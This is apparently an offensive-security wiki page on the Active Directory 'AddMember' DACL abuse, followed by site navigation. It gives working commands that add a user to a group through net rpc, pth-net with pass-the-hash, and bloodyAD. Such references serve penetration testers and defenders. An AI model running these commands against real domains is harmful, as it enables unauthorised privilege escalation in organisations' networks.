AddMember

This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership, over the target group.

It can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.

bash

# With net and cleartext credentials (will be prompted)
net rpc group addmem "$TargetGroup" "$TargetUser" -U "$DOMAIN"/"$USER" -S "$DC_HOST"

# With net and cleartext credentials
net rpc group addmem "$TargetGroup" "$TargetUser" -U "$DOMAIN"/"$USER"%"$PASSWORD" -S "$DC_HOST"

# With Pass-the-Hash
pth-net rpc group addmem "$TargetGroup" "$TargetUser" -U "$DOMAIN"/"$USER"%"ffffffffffffffffffffffffffffffff":"$NT_HASH" -S "$DC_HOST"

Alternatively, it can be achieved using bloodyAD

bash

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"

Reconnaissance

Movement

Credentials

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Netlogon

Certificate Services (AD-CS)

SCCM / MECM

Exchange services

Print Spooler Service

Schannel

Built-ins & settings

Kerberos

Certificate Services (AD-CS)

HTTP security headers

Identity and Access Management

File inclusion

LFI to RCE

Initial access (protocols)

Windows

UNIX-like

(AV) Anti-Virus

Mifare Classic

Android

AddMember

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Certificate Services (AD-CS)

SCCM / MECM

Certificate Services (AD-CS)

HTTP security headers

File inclusion

LFI to RCE

Windows

UNIX-like

Mifare Classic

AddMember ​

AddMember